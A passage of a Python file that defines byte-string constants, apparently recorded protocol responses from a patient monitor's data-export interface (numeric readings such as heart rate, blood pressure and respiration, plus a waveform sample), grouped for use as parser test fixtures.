b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x7f\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_1_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x7f\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_1_no_3 = \ b"\xe1\x00\x00\x02\x00\x02\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21" \ b"\x00\x00\x00\x00\xf1\x3b\x00\x1a\x00\x01\x00\x00\x0e\x7f\xaf\x00" \ b"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00" \ b"\x00\x00" rsp_wave_1_no_1 = \ b"\xe1\x00\x00\x02\x00\x02\x00\x30\x00\x04\x00\x07\x00\x2a\x00\x21" \ b"\x00\x00\x00\x00\xf1\x3b\x00\x20\x00\x03\x00\x00\x0e\x7f\xaf\x00" \ b"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01" \ b"\x00\x06\x00\x00\x00\x00\x00\x00" # second group of responses rsp_nu_2_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_2_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_2_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_2_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\xde\x00\x04\x00\x07\x00\xd8\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\xce\x00\x03\x00\x00\x0e\x7f\xef\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x00\xb4\x00\x00\x00\x01" \ b"\x00\xae\x08\x11\x00\x0f\x00\xa8\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x02\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x44\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xdd\x20\xa5\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\xb1\x21\xd1" # third group of responses rsp_nu_3_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x0f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ 